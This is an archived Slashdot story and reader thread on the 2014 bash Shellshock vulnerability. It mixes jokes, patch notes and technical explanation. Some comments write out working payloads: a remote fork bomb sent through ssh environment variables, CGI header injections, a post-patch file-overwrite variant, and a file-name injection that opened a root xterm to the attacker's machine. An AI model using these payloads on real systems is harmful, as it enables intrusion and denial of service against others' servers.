Remote Exploit Vulnerability Found In Bash

← Back to Stories (view on slashdot.org)

Remote Exploit Vulnerability Found In Bash

Posted by Soulskill on Wednesday September 24, 2014 @05:12AM from the don't-bash-bash dept.

kdryer39 sends this news from CSO: A remotely exploitable vulnerability has been discovered by Stephane Chazelas in bash on Linux, and it is unpleasant. The vulnerability has the CVE identifier CVE-2014-6271. This affects Debian as well as other Linux distributions. The major attack vectors that have been identified in this case are HTTP requests and CGI scripts. Another attack surface is OpenSSH through the use of AcceptEnv variables. Also through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

68 of 399 comments (clear)

Min score:

Reason:

Sort:

Dangerous by blueshift_1 · 2014-09-24 05:14 · Score: 2

I'm not suprised; Bash has always felt a bit dangerous...
1. Re:Dangerous by flyingfsck · 2014-09-24 05:51 · Score: 4, Funny
  
  Awww, come on, don't bash Bash when it is down...
  
  --
  Excuse me, but please get off my Pennisetum Clandestinum, eh!
2. Re:Dangerous by jhantin · 2014-09-24 07:30 · Score: 5, Funny
  
  ksh
  Pfffft. I should have expected Korny jokes. (Ba-dum-csh.)
  
  --
  ...when you're writing a game...tweak the difficulty of "Easy" to something [your mother] can cope with. -- onion2k
3. Re:Dangerous by Nethead · 2014-09-24 09:03 · Score: 2
  
  Tcsh, tcsh, tcsh on you!
  
  --
  -- I have a private email server in my basement.
4. Re:Dangerous by Culture20 · 2014-09-24 10:36 · Score: 4, Funny
  
  Bash has always felt a bit dangerous...
  POUND! BANG! SLASH! bin SLASH! BASH!
  #!/bin/bash
Full Disclosure can be found on oss-security... by Jizzbug · 2014-09-24 05:17 · Score: 5, Informative

https://marc.info/?l=oss-security&m=141157106132018&w=2

--

-=/\- Jizzbug -/\=-
1. Re:Full Disclosure can be found on oss-security... by lgw · 2014-09-24 05:45 · Score: 5, Interesting
  
  This is exceedingly nasty.
  
  The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function
  definition. ...
  The fact that an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation.
  This is a weapons-grade exploit IMO, the sort of thing the NSA keeps hidden for when it's really needed. I'm almost surprised it wasn't suppressed.
  Hmm, I wonder how many phones are valuable.
  
  --
  Socialism: a lie told by totalitarians and believed by fools.
2. Re:Full Disclosure can be found on oss-security... by GameboyRMH · 2014-09-24 06:03 · Score: 2
  
  I'm assuming you mean "how many phones are vulnerable."
  Only Nokia's N-series phones running Maemo, or Android phones with a Linux chroot are capable of running bash or sshd (without crazy hardcore modding).
  
  --
  "When information is power, privacy is freedom" - Jah-Wren Ryel
3. Re:Full Disclosure can be found on oss-security... by warrax_666 · 2014-09-24 07:06 · Score: 2
  
  So you don't have bash installed. I'm fucking AMAZED that your bash isn't exploitable!
  
  --
  HAND.
4. Re:Full Disclosure can be found on oss-security... by exomondo · 2014-09-24 10:30 · Score: 2
  
  Otherwise Maemo's default shell was Busybox.
  Busybox isn't a shell. The default shell included in busybox is almquist shell (or ash) - so assuming Maemo uses the default it is ash, I can't remember - which is a bourne shell clone and I'm not sure whether ash also has this vulnerability.
5. Re:Full Disclosure can be found on oss-security... by gweihir · 2014-09-24 10:38 · Score: 2
  
  Really? It does require that you give the attacker control over the environment, which is a dubious thing to do in the first place. For the ssh-based attacks, you need to be at least a user on the system, which makes this a local privilege escalation only. Sure, if somebody actually uses bash as basis for CGI, this could be remotely exploitable, but there is no reason to panic.
  
  --
  Most ACs are not even worth the keystrokes to insult them. Be generically insulted by this and ignored otherwise.
6. Re:Full Disclosure can be found on oss-security... by SumDog · 2014-09-24 11:53 · Score: 2
  
  OpenBSD is so secure with it's default install because it installs absolutely nothing useful
7. Re:Full Disclosure can be found on oss-security... by paskie · 2014-09-24 14:30 · Score: 2
  
  And now it turns out that even patched bash still carries some related security bugs. (Not really a surprise since the parser is complex and bound to, seems like running it on arbitrary environment variables really isn't the best idea...)
  So, if you think you are safe,
  export X='() { (a)=>\'
  bash -c 'brm date'
  cat brm
  (N.B. the backslash is not inhibiting the apostrophe in shell syntax.)
  That is, by crafter environment variables you can still overwrite files and run commands that were supposed to be parameters instead. This is still very dangerous, but thankfully the attack surface is smaller than before, for example $SSH_ORIGINAL_COMMAND is frequently not an issue anymore (at least in case of gitolite I couldn't *quickly* figure out a way to exploit this), etc.
  No patch for this available yet.
  Today is a fun day for linux! Think about switching your /bin/sh to dash and maybe login shell of non-interactive users too!
  
  --
  It's not the fall that kills you. It's the sudden stop at the end. -Douglas Adams
8. Re:Full Disclosure can be found on oss-security... by Ankh · 2014-09-25 03:58 · Score: 2
  
  The CGI spec tells the Web server to make the user data available as environment variables, so e.g. Apache will put them in the environment, and environment proceses are inherited to all sub-processes, so e.g. a Perl script called via CGI and using back-ticks, my $a = `pwd`; may result in code execution.
  The vulnerability doesn't apply to all ways of running code on Web servers, e.g. Java servlet APIs shoud be fine, but CGI does automatically add the HTTP headers and request paramters to the environment.
  
  --
  Live barefoot!
  free engravings/woodcuts
So now it's the year of the Linux desktop by Anonymous Coward · 2014-09-24 05:17 · Score: 5, Funny

Because we've finally become popular enough to warrant script kiddies finding holes in our toys!
Captcha: Outcry
1. Re:So now it's the year of the Linux desktop by flyingfsck · 2014-09-24 05:55 · Score: 4, Funny
  
  Oh my, that's torn it. Now I'll have to switch to Minix.
  
  --
  Excuse me, but please get off my Pennisetum Clandestinum, eh!
2. Re:So now it's the year of the Linux desktop by CRCulver · 2014-09-24 06:06 · Score: 4, Informative
  
  You do realize that bash is (nowadays) installed in damned near every *nix out there (though I think HPUX is still holding out.)
  
  Debian and a few other distros have long since switched to Dash as their /bin/sh. Openwrt uses ash (installing bash would require intentional effort), and I assume that many *nix devices with the Busybox environment in lieu of the traditional GNU toolset also eschew bash. Sure, bash is still common out there, but thankfully not as prominent as a decade ago, and even when present it might not be exposed to an attacking surface.
Missing in windows? by Anonymous Coward · 2014-09-24 05:21 · Score: 5, Funny

I can't find the bash icon in the Start menu. Anyone know where it is so I can remove it and avoid this exploit?
Thanks.
1. Re:Missing in windows? by bragr · 2014-09-24 05:42 · Score: 2
  
  Whoosh!
2. Re:Missing in windows? by flyingfsck · 2014-09-24 05:50 · Score: 4, Funny
  
  It's because there is no start menu in Windows anymore, you dum dum...
  
  --
  Excuse me, but please get off my Pennisetum Clandestinum, eh!
3. Re:Missing in windows? by just_another_sean · 2014-09-24 06:02 · Score: 4, Interesting
  
  Seriously though is cygwin's bash vulnerable?
  Looks like it is to me, haven't had a chance to check for an update yet though...
  
  --
  Creationist Textbook Stickers Declared Unconstitutional by CowboyNeal
4. Re:Missing in windows? by clovis · 2014-09-24 06:22 · Score: 4, Funny
  
  I can't find the bash icon in the Start menu. Anyone know where it is so I can remove it and avoid this exploit?
  Thanks.
  You seem to have asked a question about removing the Start Menu.
  Upgrade to Windows 8, but do not do the Win8.1 upgrade.
  Thank you for using our products in the future.
5. Re:Missing in windows? by _xeno_ · 2014-09-24 07:03 · Score: 4, Informative
  
  I just updated Cygwin to the latest, and yes, it's still vulnerable. (At least its bash-4.1.10-4 is, I suppose it's possible that the mirror I'm using is out of date.)
  
  --
  You are in a maze of twisty little relative jumps, all alike.
6. Re:Missing in windows? by Anonymous Coward · 2014-09-24 08:13 · Score: 5, Funny
  
  Um, that's not a shell that I know of. Citation needed?
7. Re:Missing in windows? by bigfinger76 · 2014-09-24 09:13 · Score: 2
  
  It can.
8. Re:Missing in windows? by hey! · 2014-09-24 12:37 · Score: 2
  
  You're one up on me. I can't find the Start Menu...
  
  --
  Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
CentOS 6.5 already has fixed package available by astro · 2014-09-24 05:22 · Score: 5, Insightful

sudo yum update bash
Thank you for the quick warning.
Only CGI scripts affected? by Anonymous Coward · 2014-09-24 05:27 · Score: 2, Interesting

So, if I undestand correctly, this affects shell scripts used for CGI; do people actually do that on what scale?
Only person I know who does this is a CS teacher in my college, onhis homepage which he has had since early 90s, are there actually commercial installations which do this, some major product with large install base ("asking this for my son")?
1. Re:Only CGI scripts affected? by gurnec · 2014-09-24 05:39 · Score: 2
  
  This also affects other scripting languages executed via CGI if the code spawns a shell, e.g.:
  #!/bin/perl
  `cat header.html`
  It doesn't necessarily affect scripting languages executed via other means, e.g. mod_*
2. Re:Only CGI scripts affected? by TheCarp · 2014-09-24 05:40 · Score: 3, Interesting
  
  Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process, well...you are already pretty compromised. If you wrote your CGI, then you are the one that compromised yourself.
  That said, you know someone does this. Hell, I have had to deal with web applications written mostly in shell and did much of their processing in shell.... the only thing that really topped it for idiocy was when I dove into some perl4 code for a password change form and found this gem:
  $password = $q->param('password');
  if "`grep $password /usr/dict/words`" != "" {
  }
  No taint checking, nothing, just shell out with whatever someone put in the form. I loaded it up and added a "; touch /tmp/foo" on the end and verified there was no protection, then I found 4 more similar errors and figured that since security issues were not even why I opened the code to read it....I re-wrote it from scratch.
  
  --
  "I opened my eyes, and everything went dark again"
3. Re:Only CGI scripts affected? by Anonymous Coward · 2014-09-24 05:47 · Score: 2
  
  CGI passes parameters through environment variables, like the request URI and user agent and everything else, to the forked process that handles the request. If the process a) is a bash script itself or b) fork-execs a child bash or /bin/sh linked to bash, without sanitizing/wiping EVERY environment variable (even ones the script doesn't use!), then it can execute arbitrary code.
  Really, there needs to be a better, saner language for easily composing prewritten executables. I hate shell syntax anyway.
4. Re:Only CGI scripts affected? by GameboyRMH · 2014-09-24 05:58 · Score: 2
  
  I'm trying to figure out if the OpenSSH vectors are actually remote exploits or just a privilege escalation in a remote access tool. From what I understand, a user has to be authenticated to get access to any of the variables this exploit can run through.
  
  --
  "When information is power, privacy is freedom" - Jah-Wren Ryel
5. Re:Only CGI scripts affected? by Anon-Admin · 2014-09-24 06:42 · Score: 2
  
  Ill top that one, back in the late 90's I was hired to check out an ISP's security. I was given standard user access to the web front end.
  They had a routine to un-tar/zip/etc a file. You could free form the file name so i entered
  junk.tgz:xterm -display my.IP.Addr:0.0
  To my surprise There was an xterm on my linux box right to their server, with full root access.
6. Re:Only CGI scripts affected? by TheCarp · 2014-09-24 07:44 · Score: 2
  
  If you think that is bad, you should see the parts I didn't mention, the contents of that if statement was something like "$ERRORNO = 101"
  The structure of the program was very simple....it had 4 functions which were called in sequence, each one would set global variables, which would be read by the other. So, if ERRORNO was set, a whole nother function with a whole different big if statement block would then print out the error message..... which is why I opened the code up...one of the errors was wrong.
  So basically, it was written in the era of perl 5, to a perl 4 standard, by someone who really liked BASIC.
  
  --
  "I opened my eyes, and everything went dark again"
7. Re:Only CGI scripts affected? by geantvert · 2014-09-24 08:10 · Score: 2
  
  Any setuid program that would call a bash script directly or indirectly could also be vulnerable.
  I predict that in the following days hackers will find several ways to cause local privileges escalations by executing system bash scripts with customized environment variables. That could be as simple as configuring a hidden WiFi network with a customized ESSID.
8. Re:Only CGI scripts affected? by Uecker · 2014-09-24 16:36 · Score: 2
  
  Yes. This only works if the user has an account. But he might be able to break out of a locked-down account which only runs a specific command.
Already fixed in Debian... by msauve · 2014-09-24 05:28 · Score: 5, Informative

Linky

--
"National Security is the chief cause of national insecurity." - Celine's First Law
1. Re:Already fixed in Debian... by reikae · 2014-09-24 05:41 · Score: 2
  
  I wonder if Debian's default /bin/sh being dash instead of bash reduces the attack surface somewhat. Do usual configurations of web servers (and others listed in TFA) call /bin/sh or /bin/bash directly?
  Hindsight is 20/20 obviously, but it makes sense to use a shell with limited features in cases where limited features are enough (especially when remotely accessible). On the other hand, now you've got two shells with potential security issues instead of just one.
2. Re:Already fixed in Debian... by Anonymous Coward · 2014-09-24 10:00 · Score: 2, Informative
  
  You probably tested with a command line that invokes bash explicitly. dash doesn't even have the feature that this exploit targets.
Thanks god by Anonymous Coward · 2014-09-24 05:33 · Score: 4, Funny

Thanks god I am using windows.
1. Re:Thanks god by LordLimecat · 2014-09-24 06:00 · Score: 2
  
  Thats not a powershell vulnerability, its a piece of malware written in Powershell.
  What you said would be like claiming C++ exploits because many viruses are written in C++.
2. Re:Thanks god by msauve · 2014-09-24 06:00 · Score: 4, Funny
  
  Your god makes you use Windows? You have a vengeful god.
  
  --
  "National Security is the chief cause of national insecurity." - Celine's First Law
Test string here: by B5_geek · 2014-09-24 05:41 · Score: 5, Informative

This is the test to see if you are vulnerable: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

--
"The price good men pay for indifference to public affairs is to be ruled by evil men." ~Plato (427-347 BC)
1. Re:Test string here: by TheCarp · 2014-09-24 05:51 · Score: 2
  
  I have to admit, my suspicous old self had to spend a minute making sure this wasn't a fork bomb. Which, I have to say, this would be the perfect thread for if you were into that sort of mischief. In any case, yah that shouldn't worl. That really shouldn't work at all.
  
  --
  "I opened my eyes, and everything went dark again"
2. Re:Test string here: by B5_geek · 2014-09-24 06:00 · Score: 5, Informative
  
  SSH into your host.
  from the bash prompt just paste the above string.
  i.e.
  user@host $env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  --------------------
  If you see:
  vulnerable
  this is a test
  Then you are vulnerable and need to update your system.
  If all you see is:
  this is a test
  Then you are ok.
  
  --
  "The price good men pay for indifference to public affairs is to be ruled by evil men." ~Plato (427-347 BC)
3. Re:Test string here: by TheCarp · 2014-09-24 06:04 · Score: 2
  
  I was actually just thinking another way to use this might be to have ssh pass x='() { :;}; echo vulnerable' as a variable to remote systems, that way whenever you login to a remote system, it just tells you whether it is vulnerable or not on login.
  
  --
  "I opened my eyes, and everything went dark again"
4. Re:Test string here: by chihowa · 2014-09-24 06:15 · Score: 4, Informative
  
  The (ancient) version of bash that ships with OS X appears vulnerable. Luckily, as a remote exploit, only authenticated ssh sessions and cgi scripts etc expose it, so most single user workstations (of all OSs) should be safe.
  If this is a bash exploit, and not a Linux exploit, why all of the focus on Linux in the article? I use bash on many different OSs.
  
  --
  If you want a vision of the future, imagine a youtube comments section scrolling - forever.
5. Re:Test string here: by OzPeter · 2014-09-24 06:22 · Score: 5, Informative
  
  I just tried it on 2 different version s of OSX: 10.9.4 and 10.7.5 and confirm that they print out the "vulnerable" message
  
  --
  I am Slashdot. Are you Slashdot as well?
6. Re:Test string here: by Megane · 2014-09-24 08:53 · Score: 2
  
  FWIW, I tried changing "echo vulnerable" to "whoami" and it didn't work. In fact, it segfaulted! Then I changed it to "echo `whoami`" and it worked as expected. So while it may possibly only work directly with built-in shell commands, they still get the full benefit of the command line parser and its handling of backquotes.
  
  --
  #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
7. Re:Test string here: by multiplexo · 2014-09-24 10:45 · Score: 4, Informative
  
  Most sshd daemons aren't configured to accept just any environment variables, they limit exposure with an AcceptEnv directive in the sshd configuration file (/etc/ssh/sshd_config on most Linux versions. This means that
  
  env x='() { :;}; echo vulnerable' ssh some_user@some_server
  
  probably won't work on most systems but
  
  env LC_FRED='() { :;}; echo vulnerable ssh some_user@some_server'
  
  will if the server is configured to accept the LC_* environment variables with the AcceptEnv directive in sshd_config.
  
  --
  cheap labor conservatives - they want to keep you hungry enough to be thankful for minimum wage.
Really? Using bash for CGI? by Anonymous Coward · 2014-09-24 05:48 · Score: 4, Interesting

All the systems I've done security pen tests against that were using bash for CGI were so easy to hack via other means it wasn't funny. And of course that web server CGI was running as root so root shell and done.
Stop using Bash for CGI unless you want to get pwned. Similar theme with 90% of the Perl CGI I run into.
Terminal vulnerabilities by Dimwit · 2014-09-24 05:48 · Score: 2

My favorite of this sort of thing is CVE-2009-1717, which was a bug in Apple's terminal emulator in Mac OS X. Sending certain escape sequences to it caused it to blow up and potentially execute code. What was fun is that putting a "telnet://" link in a web page would automatically cause Mac OS X to automatically open a terminal and connect to a remote host with no prompting by the user. It was a pretty neat vulnerability.

--
...but it's being eaten...by some...Linux or something...
Exploit depends on not validating input? by h4ck7h3p14n37 · 2014-09-24 05:50 · Score: 2

Someone correct me if I'm mistaken, but doesn't this exploit depend on programs not validating input?
The example given in the post to oss-security mentions HTTP request headers containing malicious data being passed into CGI programs which then call out to Bash. Wouldn't taint-checking input eliminate that attack vector?
1. Re:Exploit depends on not validating input? by Qzukk · 2014-09-24 06:32 · Score: 2
  
  It's not being passed in as usual data, it's being passed in as environment variables, most programmers ignore all the variables that are not relevant to their program (which is usually all of them).
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
2. Re:Exploit depends on not validating input? by Bacon+Bits · 2014-09-24 06:50 · Score: 2
  
  When httpd runs a CGI script, it passes data to the script with bash environment variables. That means the code would be executed by httpd in whatever context it runs CGI scripts. The CGI script itself hasn't even been executed yet.
  
  --
  The road to tyranny has always been paved with claims of necessity.
Re:Maybe it has to do with spelling by gstoddart · 2014-09-24 06:02 · Score: 2

Flash... Java... Bash. They all have the letter 'a' in them as their first vowel.
I think it's a conspiracy by the first letter of the english alphabet.... Yup, that must be it.
Oh wait.... "Windows". Hmm... that doesn't fit the pattern at all, does it?
Well, that's OK. i is like a for large enough values of a (or really small values of i).
And depending on what part of the world you're in, the sound of vowels can change quite a bit.
A few years back, my wife's mother and some friends were in the southern US ... she walked into the store and asked if they have any pins ... the cashier asked if she "wanted a ball point pin or a fountain pin". I kid you not.
In fact, my wife had an economics prof from Texas once. There was no discernible difference between the sound of "microeconomics" and "macroeconomics", because apparently a and i have the same value there.
Therefore, in Texas, your statement is 100% true. ;-)

--
Lost at C:>. Found at C.
so a remote fork bomb is possible? by Killer+Instinct · 2014-09-24 06:24 · Score: 4, Interesting

VAR=() { ignored; }; : :(){ :|:& };:

--
#include bier;
1. Re:so a remote fork bomb is possible? by multiplexo · 2014-09-24 11:26 · Score: 5, Interesting
  
  Yes, run this:
  
  env LC_BOMB='() { :;}; :(){ :|:& };:' ssh some_user@some_system
  
  And if some_user is using bash and the ssh daemon on the system is configured with AcceptEnv LC_*, which most of them are, you'll end up with an awesome remote fork bomb.
  
  --
  cheap labor conservatives - they want to keep you hungry enough to be thankful for minimum wage.
You are mistaken. No input processing needed by raymorris · 2014-09-24 06:50 · Score: 3, Informative

> Someone correct me if I'm mistaken, but doesn't this exploit depend on programs not validating input?
Suppose you have pwd.cgi, which prints the name of the current directory:
#!/bin/sh
echo -e "Content-type: text/plain\n\n"
pwd
Notice the script uses no input at all. It is potentially vulnerable. Here's why. Suppose you did want to validate your input. You'd look at the contents of $QUERY_STRING, right? You can find what the user entered in the QUERY_STRING environment variable because bash puts it there. That's the step where the problem lies - bash can EXECUTE the contents of the query string while setting the environment variable. This occurs before the user's script even begins to run.
And in Gentoo by crow · 2014-09-24 06:57 · Score: 2

app-shells/bash-4.2_p47-r1 is not vulnerable. I just updated.
Not arbitrary variables - QUERY_STRING by raymorris · 2014-09-24 07:29 · Score: 5, Informative

> Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process, well...you are already pretty compromised. If you wrote your CGI, then you are the one that compromised yourself.
The contents of the CGI script don't matter. The exploit occurs before the script runs. It happens as bash is setting up the environment in which the script will be run.
Suppose you have pwd.cgi, which prints the name of the current directory:
#!/bin/sh
echo -e "Content-type: text/plain\n\n"
pwd
Notice the script uses no input at all. It is potentially vulnerable. Here's why. Suppose you did want to validate your input. You'd look at the contents of $QUERY_STRING, right? You can find what the user entered in the QUERY_STRING environment variable because bash puts it there. That's the step where the problem lies - bash can EXECUTE the contents of the query string while setting the environment variable. This occurs before the user's script even begins to run.
1. Re:Not arbitrary variables - QUERY_STRING by menkhaura · 2014-09-24 08:37 · Score: 4, Informative
  
  Setup a local cgi script on your Linux machine. Telnet into its port 80. Assuming your cgi script is at /cgi-bin/test.sh, type the following in the telnet prompt:
  GET /cgi-bin/um.pl HTTP/1.1 Host: localhost Custom: () { :; }; while read -r l; do echo $l; done
  Press ENTER twice after the last header.
  If you don't use a shell builtin, the shell ends with a segfault and Apache shows an error, but the command is executed server-side. Scary.
  
  --
  Stupidity is an equal opportunity striker.
  Fellow slashdotter Bill Dog
Worse than you think. by slimjim8094 · 2014-09-24 08:44 · Score: 5, Interesting

Almost *ANY* CGI is vulnerable, because the way CGI works is by environment variables. And the attacker can control them. You don't have to be doing anything stupid or wrong to be affected. It looks like other ways of executing web applications (e.g., mod_php) are safe - to the extent that they don't use a popen or a system() or something, which is a pretty common thing to do.
Your DHCP client (on a Linux) machine passes data to its hooks via environment variables. These can be set by the attacker. Even better, it's running as root. Boom, connect to a rogue AP and get rooted while receiving an address assignment.
You probably do Git commits via a (locked-down) SSH login. That's compromised.
Shells are everywhere. Again, this doesn't require your application to have screwed up. This is a flaw in how environment variables are parsed and set, which is something that was presumed safe, so nobody thought about it. Bad bad bad bad. Not Heartbleed bad, but close.

--
I have developed a truly marvelous proof of this comment, which this signature is too narrow to contain.
Re:Remote exploit when it cant be exploited remote by Megane · 2014-09-24 08:48 · Score: 2

Sure, but anything remote that can set up environment variables before starting bash can exploit it. Lots of idiot programmers like to blindly shell out to do stuff even when there's a simple library function to do things, such as unlink("$path") vs. system("rm $path"). And environment variables have this pesky habit of sticking around when you do that. Environment variables are commonly used with CGI, which is also commonly used with idiot programmers. So while it may be a "local" exploit, that's with unusually large values of "local".

--
#naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
Re:yum: Could not find update match for bash by sosume · 2014-09-24 10:20 · Score: 3, Informative

sudo mv /bin/bash /bin/woosh
Re:My explanation by spitzak · 2014-09-24 11:10 · Score: 2

Well I don't know much bash, so I figured out why this is happening, though it still seems unbelievable.
Apparently the normal way to define a function is to write "x() {...}". But it stores it in an environment variable for some reason, I think so that a recursively called bash gets the same function definition.
To support that, on startup it scans the environment for variables starting with "() {" (spacing must be exactly that). It then defines the function by pasting the variable name onto the start of the variable and interpreting that. And the interpreter splits at the semicolons and executes the remaining text as commands, leading to this bug.
The whole thing looks pretty messy. Certainly it should have been possible to call some lower-level function *after* the interpreter has figured out it is defining a function, and that one would barf on the semicolon. Also you get this interesting and misleading effect:
$ export x='() { echo WORKS;}'
$ x
x: command not found
$ bash -c x
WORKS
Their solution is rather annoying because you now cannot set environment variables to all possible byte strings. That sucks. They should have left the environment variable set to the text and not defined the function.
Detailed info from RedHat by Beeftopia · 2014-09-24 14:02 · Score: 3, Informative

Example attacks are listed on Red Hat's security blog.
Re:Really? Using bash for CGI? by ArsenneLupin · 2014-09-24 23:13 · Score: 2

The problem affects any CGI that *calls* bash, which means any call to system() in any language is going to cause a problem.
Nowadays, on most systems, /bin/sh is a proper Bourne Shell (either ash or dash), and no longer bash. So system() should no longer be an issue, but explicitly calling bash still would be...